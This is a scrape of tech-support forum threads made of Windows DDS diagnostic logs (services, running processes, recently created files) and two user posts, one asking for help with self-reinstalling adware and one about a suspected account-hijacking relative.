S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2015-7-10 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2015-7-10 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2015-7-10 27488]
S3 USBAAPL64;Apple Mobile USB Driver;C:\WINDOWS\System32\drivers\usbaapl64.sys [2014-8-15 54784]
S3 UsoSvc;Update Orchestrator Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2015-7-10 31744]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 vmicvmsession;Hyper-V VM Session Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2015-7-10 39856]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2015-8-11 685568]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2015-7-10 119648]
S3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2015-7-10 362928]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2015-7-10 39856]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2015-7-10 26976]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2015-7-10 59232]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 WpnService;Windows Push Notifications Service;C:\WINDOWS\System32\svchost.exe -k wswpnservice [2015-7-10 39856]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2015-7-10 222720]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2015-7-10 25600]
S4 ArcService;Arc Service;C:\Program Files (x86)\Perfect World Entertainment\Arc\ArcService.exe [2013-8-28 88424]
S4 DAUpdaterSvc;Dragon Age: Origins - Content Updater;C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe [2014-5-9 25832]
S4 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2014-12-11 315496]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2015-09-10 22:28:17 16148 ----a-w- C:\WINDOWS\System32\CHRIS-PC_Chris_HistoryPrediction.bin
2015-09-10 03:22:51 -------- d-----w- C:\Program Files\Common Files\AV
2015-09-10 03:18:57 -------- d-----w- C:\Users\Chris\AppData\Roaming\LavasoftStatistics
2015-09-10 03:17:55 -------- d-----w- C:\Users\Chris\AppData\Local\Lavasoft
2015-09-10 03:17:21 425744 ----a-w- C:\WINDOWS\System32\LavasoftTcpService64.dll
2015-09-10 03:17:20 345360 ----a-w- C:\WINDOWS\SysWow64\LavasoftTcpService.dll
2015-09-10 03:17:19 -------- d-----w- C:\Program Files (x86)\Lavasoft
2015-09-10 03:16:26 -------- d-----w- C:\Program Files\Lavasoft
2015-09-10 03:16:02 -------- d-----w- C:\Program Files\Common Files\Lavasoft
2015-09-10 03:15:07 21040 ----a-w- C:\WINDOWS\System32\sdnclean64.exe
2015-09-10 03:15:05 -------- d-----w- C:\ProgramData\Spybot - Search & Destroy
2015-09-10 03:14:54 -------- d-----w- C:\Program Files (x86)\Spybot - Search & Destroy 2
2015-09-10 02:59:29 -------- d-----w- C:\WINDOWS\pss
2015-09-10 00:26:35 11745192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{928049B6-2A91-49B8-B0FF-1EB54F85BA5B}\mpengine.dll
2015-09-09 00:08:32 11745192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2015-09-08 12:07:44 16148 ----a-w- C:\WINDOWS\System32\CHRIS-PC_Jeff_HistoryPrediction.bin
2015-09-03 23:10:12 1190000 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5CA7D4E6-52FD-4CAF-B22B-57451442A284}\gapaengine.dll
2015-09-02 01:08:20 574072 ----a-w- C:\WINDOWS\SysWow64\nvStreaming.exe
2015-09-02 00:57:39 69416 ----a-w- C:\WINDOWS\SysWow64\nvaudcap32v.dll
2015-08-28 11:30:59 609592 ----a-w- C:\WINDOWS\System32\ci.dll
2015-08-21 23:48:08 -------- d-----w- C:\Users\Chris\AppData\Roaming\OpenOffice
2015-08-20 01:46:05 16706560 ----a-w- C:\WINDOWS\System32\Windows.UI.Xaml.dll
2015-08-20 01:46:02 13024768 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Xaml.dll
.
==================== Find3M ====================
.
2015-08-30 22:47:38 11188880 ----a-w- C:\WINDOWS\System32\drivers\nvlddmkm.sys
2015-08-27 00:37:01 1423120 ----a-w- C:\WINDOWS\SysWow64\nvspcap.dll
2015-08-27 00:37:01 1316000 ----a-w- C:\WINDOWS\SysWow64\nvspbridge.dll
2015-08-27 00:36:47 1756424 ----a-w- C:\WINDOWS\System32\nvspbridge64.dll
2015-08-27 00:36:47 1710568 ----a-w- C:\WINDOWS\System32\nvspcap64.dll
2015-08-25 15:57:35 937592 ----a-w- C:\WINDOWS\System32\nvvsvc.exe
2015-08-25 15:57:34 6884984 ----a-w- C:\WINDOWS\System32\nvcpl.dll
2015-08-25 15:57:34 62584 ----a-w- C:\WINDOWS\System32\nvshext.dll
2015-08-25 15:57:34 385144 ----a-w- C:\WINDOWS\System32\nvmctray.dll
2015-08-25 15:57:34 3496752 ----a-w- C:\WINDOWS\System32\nvsvc64.dll
2015-08-25 15:57:34 2558584 ----a-w- C:\WINDOWS\System32\nvsvcr.dll
2015-08-25 13:02:18 5165808 ----a-w- C:\WINDOWS\System32\nvcoproc.bin
2015-08-20 06:07:55 8019296 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2015-08-20 05:57:13 77400 ----a-w- C:\WINDOWS\System32\acmigration.dll
2015-08-20 05:26:23 168960 ----a-w- C:\WINDOWS\System32\InstallAgent.exe
2015-08-20 05:21:28 21875200 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2015-08-20 05:21:13 193024 ----a-w- C:\WINDOWS\System32\EnterpriseModernAppMgmtCSP.dll
2015-08-20 04:31:28 18806272 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2015-08-18 07:56:25 2498808 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2015-08-18 07:55:45 373072 ----a-w- C:\WINDOWS\System32\drivers\USBXHCI.SYS
2015-08-18 07:54:30 1396064 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2015-08-18 07:27:23 1771592 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2015-08-18 07:24:35 963920 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2015-08-18 07:13:10 497664 ----a-w- C:\WINDOWS\System32\WlanMediaManager.dll
2015-08-18 07:13:06 387584 ----a-w- C:\WINDOWS\System32\NetSetupShim.dll
2015-08-18 07:12:20 692224 ----a-w- C:\WINDOWS\System32\drivers\UMDF\NfcCx.dll
2015-08-18 07:12:18 2225664 ----a-w- C:\WINDOWS\System32\NetworkMobileSettings.dll
2015-08-18 07:07:34 2226688 ----a-w- C:\WINDOWS\System32\wlansvc.dll
2015-08-18 07:04:20 859136 ----a-w- C:\WINDOWS\System32\modernexecserver.dll
2015-08-18 07:04:14 1234944 ----a-w- C:\WINDOWS\System32\aitstatic.exe
2015-08-18 06:59:35 1294336 ----a-w- C:\WINDOWS\System32\wcnwiz.dll
2015-08-18 06:59:02 140288 ----a-w- C:\WINDOWS\System32\WcnApi.dll
2015-08-18 06:58:46 50176 ----a-w- C:\WINDOWS\System32\WcnNetsh.dll
2015-08-18 06:58:34 112640 ----a-w- C:\WINDOWS\System32\fdWCN.dll
2015-08-18 06:58:31 117760 ----a-w- C:\WINDOWS\System32\dafWCN.dll
2015-08-18 06:58:25 187392 ----a-w- C:\WINDOWS\System32\NetSetupSvc.dll
2015-08-18 06:57:54 45568 ----a-w- C:\WINDOWS\System32\wfdprov.dll
2015-08-18 06:56:48 79872 ----a-w- C:\WINDOWS\System32\BthRadioMedia.dll
2015-08-18 06:55:01 2178560 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2015-08-18 06:54:11 247296 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2015-08-18 06:54:03 322048 ----a-w- C:\WINDOWS\System32\vaultsvc.dll
2015-08-18 06:52:26 1888768 ----a-w- C:\WINDOWS\System32\dwmcore.dll
2015-08-18 06:50:04 1795072 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.dll
2015-08-18 06:49:52 1061888 ----a-w- C:\WINDOWS\System32\reseteng.dll
2015-08-18 06:49:20 246272 ----a-w- C:\WINDOWS\System32\PackageStateRoaming.dll
2015-08-18 06:49:03 274432 ----a-w- C:\WINDOWS\SysWow64\NetSetupShim.dll
2015-08-18 06:36:08 1226752 ----a-w- C:\WINDOWS\SysWow64\wcnwiz.dll
2015-08-18 06:35:49 100352 ----a-w- C:\WINDOWS\SysWow64\WcnApi.dll
2015-08-18 06:35:18 95744 ----a-w- C:\WINDOWS\SysWow64\fdWCN.dll
2015-08-18 06:34:44 37376 ----a-w- C:\WINDOWS\SysWow64\wfdprov.dll
2015-08-18 06:29:11 1593344 ----a-w- C:\WINDOWS\SysWow64\dwmcore.dll
2015-08-18 06:26:08 195584 ----a-w- C:\WINDOWS\SysWow64\PackageStateRoaming.dll
2015-08-13 04:22:26 2093056 ----a-w- C:\WINDOWS\System32\wlidsvc.dll
2015-08-13 04:20:39 414208 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2015-08-13 03:53:21 311808 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2015-08-11 10:04:24 2462648 ----a-w- C:\WINDOWS\System32\mfcore.dll
2015-08-11 10:04:23 4532304 ----a-w- C:\WINDOWS\explorer.exe
2015-08-11 10:04:15 1087296 ----a-w- C:\WINDOWS\System32\mfplat.dll
2015-08-11 10:03:09 442208 ----a-w- C:\WINDOWS\System32\drivers\storport.sys
2015-08-11 10:02:57 554744 ----a-w- C:\WINDOWS\System32\directmanipulation.dll
2015-08-11 10:02:56 80720 ----a-w- C:\WINDOWS\System32\drivers\stornvme.sys
2015-08-11 10:02:49 292856 ----a-w- C:\WINDOWS\System32\LockAppHost.exe
2015-08-11 09:52:49 993104 ----a-w- C:\WINDOWS\System32\ReAgent.dll
2015-08-11 09:50:47 1643872 ----a-w- C:\WINDOWS\System32\diagtrack.dll
2015-08-11 09:40:22 4048808 ----a-w- C:\WINDOWS\SysWow64\explorer.exe
2015-08-11 09:40:12 918320 ----a-w- C:\WINDOWS\SysWow64\mfplat.dll
2015-08-11 09:40:08 2151208 ----a-w- C:\WINDOWS\SysWow64\mfcore.dll
2015-08-11 09:38:22 454000 ----a-w- C:\WINDOWS\SysWow64\directmanipulation.dll
2015-08-11 09:37:48 243800 ----a-w- C:\WINDOWS\SysWow64\LockAppHost.exe
2015-08-11 09:26:03 845664 ----a-w- C:\WINDOWS\SysWow64\ReAgent.dll
2015-08-11 09:21:13 148992 ----a-w- C:\WINDOWS\System32\tetheringservice.dll
2015-08-11 09:21:04 52224 ----a-w- C:\WINDOWS\System32\tetheringclient.dll
2015-08-11 09:20:02 483328 ----a-w- C:\WINDOWS\System32\OneDriveSettingSyncProvider.dll
2015-08-11 09:19:45 235520 ----a-w- C:\WINDOWS\System32\SettingsHandlers_Notifications.dll
2015-08-11 09:18:44 235008 ----a-w- C:\WINDOWS\System32\UserMgrProxy.dll
2015-08-11 09:16:32 2416640 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2015-08-11 09:14:02 404480 ----a-w- C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-11 09:13:42 413184 ----a-w- C:\WINDOWS\System32\diagtrack_win.dll
2015-08-11 09:11:40 2446336 ----a-w- C:\WINDOWS\System32\InputService.dll
2015-08-11 09:11:18 553472 ----a-w- C:\WINDOWS\System32\GamePanel.exe
2015-08-11 09:10:47 293376 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
2015-08-11 09:10:12 324096 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-08-11 09:10:06 778752 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.Store.dll
2015-08-11 09:09:55 32768 ----a-w- C:\WINDOWS\System32\wuautoappupdate.dll
2015-08-11 09:08:04 893440 ----a-w- C:\WINDOWS\System32\MbaeApiPublic.dll
2015-08-11 09:08:04 563200 ----a-w- C:\WINDOWS\System32\MbaeApi.dll
2015-08-11 09:07:52 593920 ----a-w- C:\WINDOWS\System32\wcmsvc.dll
2015-08-11 09:07:47 1178112 ----a-w- C:\WINDOWS\System32\wwansvc.dll
2015-08-11 09:07:44 115712 ----a-w- C:\WINDOWS\System32\MbaeParserTask.exe
2015-08-11 09:06:50 2662400 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2015-08-11 09:06:19 7523328 ----a-w- C:\WINDOWS\System32\Chakra.dll
2015-08-11 09:05:48 342016 ----a-w- C:\WINDOWS\System32\LocationGeofences.dll
2015-08-11 09:05:27 269312 ----a-w- C:\WINDOWS\System32\LocationFramework.dll
2015-08-11 09:05:23 78848 ----a-w- C:\WINDOWS\System32\LocationFrameworkInternalPS.dll
2015-08-11 09:05:20 137216 ----a-w- C:\WINDOWS\System32\LocationPermissions.dll
2015-08-11 09:05:10 996352 ----a-w- C:\WINDOWS\System32\RDXService.dll
2015-08-11 09:05:07 3527168 ----a-w- C:\WINDOWS\System32\tquery.dll
2015-08-11 09:03:09 2558976 ----a-w- C:\WINDOWS\System32\mssrch.dll
2015-08-11 09:02:53 186368 ----a-w- C:\WINDOWS\System32\cloudAP.dll
2015-08-11 09:02:15 621056 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
.
============= FINISH: 18:38:33.30 ===============

Attached Files
File Type: txt attach.txt (16.7 KB)

Unwanted programs/adware?

So I guess I downloaded a thing that installed a bunch of unwanted programs (I don't even remember what it was, I was researching stuff and out of nowhere so many pop-ups) and every time I would uninstall one of them, like two more would install by themselves. Every time I go on my browser a bunch of ad pages show up and it slows down my laptop. I tried AdwCleaner and it deleted a lot of malware files from the programs that were installed, but when I checked Control Panel more programs were installed. I really don't know what to do??? AdwCleaner didn't delete some of the files it found; I could copy and paste the log on here if anyone wants to take a look??? I don't know.

No control over laptop!!

Hiya, I need some urgent help, my bro in law has hacked my system. Tried all spyware, malware programs to detect any keyloggers, remote assist bugs etc. but nothing comes up. I know there's something as he still figures out my FB passwords, freezes up my computer as he wishes, changing certain options, deleting files etc.
Need some help as I'm a bit witty with PCs but it's been a while so not really up to scratch with the latest stuff lol

I ran gaming pages and YouTube channels so I tend to share content into groups etc., he makes life hard for me by getting me kicked/banned from groups regularly... I assume he logs in as me on any of my accounts and posts porn into the groups I'm in so I can get banned/kicked out... not to mention getting my FB accounts in trouble as well... and he does all this because he thinks he can get away with it because there's no proof or I can't show proof. Him and his minions troll me day and night, and he knows where to find my posts as he's hacked my system.

Update: Tried several antivirus programs including ESET, Spybot etc. but nothing comes up... any help would be appreciated. Thanks

DDS

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 9.0.8112.16696 BrowserJavaVersion: 11.31.2
Run by User at 17:31:35 on 2015-09-11
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.44.1033.18.3061.1170 [GMT 1:00]
.
AV: ESET NOD32 Antivirus 8.0 *Enabled/Updated* {19259FAE-8396-A113-46DB-15B0E7DFA289}
AV: AVG AntiVirus Free Edition 2015 *Disabled/Outdated* {4D41356F-32AD-7C42-C820-63775EE4F413}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition 2015 *Disabled/Outdated* {F620D48B-1497-73CC-F290-58052563BEAE}
SP: ESET NOD32 Antivirus 8.0 *Enabled/Updated* {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}
FW: AVG Internet Security 2015 *Disabled* {757AB44A-78C2-7D1A-E37F-CA42A037B368}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\System32\WLTRYSVC.EXE
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\bcmwltry.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\AVG\AVG2015\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\BlueStacks\HD-LogRotatorService.exe
C:\Program Files\BlueStacks\HD-UpdaterService.exe
C:\Program Files\Nero\Update\NASvc.exe
C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Zemana AntiMalware\ZAM.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\WLTRAY.EXE
C:\Program Files\AVG\AVG2015\avgui.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\ctfmon.exe
C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
C:\Windows\System32\mobsync.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Windows\system32\Taskmgr.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
.
============== Pseudo HJT Report ===============
.
uStart Page = Google
uSearch Bar = Google
uDefault_Page_URL = about:blank
mStart Page = about:blank
mSearch Page = about:blank
mDefault_Page_URL = about:blank
mDefault_Search_URL = about:blank
BHO: RealNetworks Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - c:\programdata\realnetworks\realdownloader\browserplugins\ie\rndlbrowserrecordplugin.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office14\GROOVEEX.DLL
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre1.8.0_31\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre1.8.0_31\bin\jp2ssv.dll
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [Xvid] c:\program files\xvid\CheckUpdate.exe
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
mRun: [Broadcom Wireless Manager UI] c:\windows\system32\WLTRAY.exe
mRun: [SwitchBoard] c:\program files\common files\adobe\switchboard\SwitchBoard.exe
mRun: [AdobeCS5.5ServiceManager] "c:\program files\common files\adobe\cs5.5servicemanager\CS5.5ServiceManager.exe" -launchedbylogin
mRun: [AVG_UI] "c:\program files\avg\avg2015\avgui.exe" /TRAYONLY
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [ZAM] "c:\program files\zemana antimalware\ZAM.exe" /minimized
mRun: [PC Cleaners] "c:\programdata\pc cleaners\PCCleaners.exe" /minimize
mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
mRun: [egui] "c:\program files\eset\eset nod32 antivirus\egui.exe" /hide /waitservice
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\micros~2\office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - c:\program files\microsoft office\office14\ONBttnIELinkedNotes.dll
DPF: {CAFEEFAC-0018-0000-0025-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_25-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_25-windows-i586.cab
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{278A7B0F-A822-43DD-A7E2-42510197FD1C} : DHCPNameServer = 149.254.230.7 149.254.192.126
TCP: Interfaces\{361C2C64-E765-485B-A392-96829E3B17EA} : DHCPNameServer = 192.168.0.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
Notify: igfxcui - igfxdev.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office14\GROOVEEX.DLL
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\45.0.2454.85\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHX;AVGIDSHX;c:\windows\system32\drivers\avgidshx.sys [2015-5-12 190944]
R0 Avglogx;AVG Logging Driver;c:\windows\system32\drivers\avglogx.sys [2015-5-7 290272]
R0 Avgmfx86;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\drivers\avgmfx86.sys [2015-7-28 186800]
R0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\drivers\avgrkx86.sys [2015-3-20 35808]
R1 Avgdiskx;AVG Disk Driver;c:\windows\system32\drivers\avgdiskx.sys [2015-3-11 132576]
R1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\drivers\avgidsdriverx.sys [2015-7-28 250288]
R1 AVGIDSShim;AVGIDSShim;c:\windows\system32\drivers\avgidsshimx.sys [2015-7-23 31664]
R1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\drivers\avgldx86.sys [2015-6-16 207328]
R1 Avgtdix;AVG TDI Driver;c:\windows\system32\drivers\avgtdix.sys [2015-5-12 213984]
R2 BstHdDrv;BlueStacks Hypervisor;c:\program files\bluestacks\HD-Hypervisor-x86.sys [2015-6-16 131704]
.
=============== Created Last 30 ================
.
2015-09-11 11:50:16 -------- d-----w- c:\users\bodo\appdata\local\ESET
2015-09-09 19:38:22 102912 ----a-w- c:\windows\system32\drivers\srvnet.sys
2015-09-09 19:38:21 304640 ----a-w- c:\windows\system32\drivers\srv.sys
2015-09-09 19:32:08 1402368 ----a-w- c:\windows\system32\msxml6.dll
2015-09-09 19:32:08 1253376 ----a-w- c:\windows\system32\msxml3.dll
2015-09-09 19:07:20 2048 ----a-w- c:\windows\system32\tzres.dll
2015-09-09 19:04:53 940032 ----a-w- c:\program files\common files\microsoft shared\ink\journal.dll
2015-09-09 19:04:52 1850880 ----a-w- c:\program files\windows journal\Journal.exe
2015-09-09 19:04:51 1220608 ----a-w- c:\program files\windows journal\NBDoc.DLL
2015-09-09 19:04:50 985600 ----a-w- c:\program files\windows journal\JNTFiltr.dll
2015-09-09 19:04:50 967680 ----a-w- c:\program files\windows journal\JNWDRV.dll
2015-09-09 19:02:59 34304 ----a-w- c:\windows\system32\atmlib.dll
2015-09-09 19:02:59 297472 ----a-w- c:\windows\system32\atmfd.dll
2015-09-09 19:02:55 2067456 ----a-w- c:\windows\system32\win32k.sys
2015-09-09 19:00:50 602112 ----a-w- c:\windows\system32\schedsvc.dll
2015-08-31 22:50:40 -------- d-----w- c:\users\User\appdata\roaming\RealNetworks
2015-08-31 22:49:28 -------- d-----w- c:\program files\RealNetworks
2015-08-31 22:49:22 -------- d-----w- c:\programdata\RealNetworks
2015-08-31 10:18:30 -------- d-----w- c:\programdata\PC Cleaners
2015-08-31 10:18:23 -------- d-----w- c:\programdata\PC1Data
2015-08-30 01:00:30 -------- d-----w- c:\programdata\KingSoft
2015-08-30 00:57:55 -------- d-----w- c:\programdata\TXQMPC
2015-08-30 00:57:55 -------- d-----w- c:\program files\Rising
2015-08-30 00:57:53 -------- d-----w- c:\programdata\Rising
2015-08-30 00:54:35 -------- d-----w- c:\program files\common files\Tencent
2015-08-30 00:51:20 -------- d-----w- c:\users\User\appdata\roaming\Tencent
2015-08-30 00:51:15 -------- d-----w- c:\programdata\Tencent
2015-08-30 00:19:02 -------- d-----w- C:\ppsfile
2015-08-30 00:19:01 -------- d-----w- C:\qycache
2015-08-30 00:11:40 -------- d-----w- C:\IQIYI Video
2015-08-30 00:02:23 -------- d-----w- c:\users\User\appdata\local\globalUpdate
2015-08-30 00:02:23 -------- d-----w- c:\program files\globalUpdate
2015-08-30 00:00:23 -------- d-----w- c:\users\User\appdata\roaming\DailyPCClean
2015-08-29 23:39:35 -------- d-----w- c:\users\User\appdata\local\4C4C4544-1440895174-3710-8046-C4C04F4E334A
2015-08-29 23:38:12 -------- d-----w- c:\programdata\28341ff220e0446c9fff27c4493d622e
2015-08-29 23:35:41 -------- d-----w- c:\users\User\appdata\roaming\WeatherTool
2015-08-29 15:20:06 -------- d-----w- c:\program files\Controller
2015-08-29 15:00:36 -------- d-----w- c:\programdata\regid.1986-12.com.adobe
2015-08-29 12:00:15 -------- d-----w- c:\users\User\appdata\local\{925B1088-DD5F-47C0-8964-53D8D1C5CF0E}
2015-08-29 11:29:38 -------- d-----w- c:\users\User\appdata\local\{8F1267F6-E90F-490A-82CA-509F1DFD0E9C}
2015-08-27 11:25:17 -------- d-----w- c:\programdata\Sony Corporation
2015-08-26 09:08:52 -------- d-----w- c:\program files\SystemRequirementsLab
2015-08-25 12:52:55 -------- d-----w- c:\users\User\appdata\local\{B318BA93-77DE-4D50-BAEA-A18131CFA774}
2015-08-24 10:45:29 -------- d-----w- c:\program files\World of Warcraft
2015-08-24 10:42:01 -------- d-----w- c:\users\User\appdata\local\Blizzard Entertainment
2015-08-24 10:41:41 -------- d-----w- c:\users\User\appdata\roaming\Battle.net
2015-08-24 10:41:41 -------- d-----w- c:\users\User\appdata\local\Battle.net
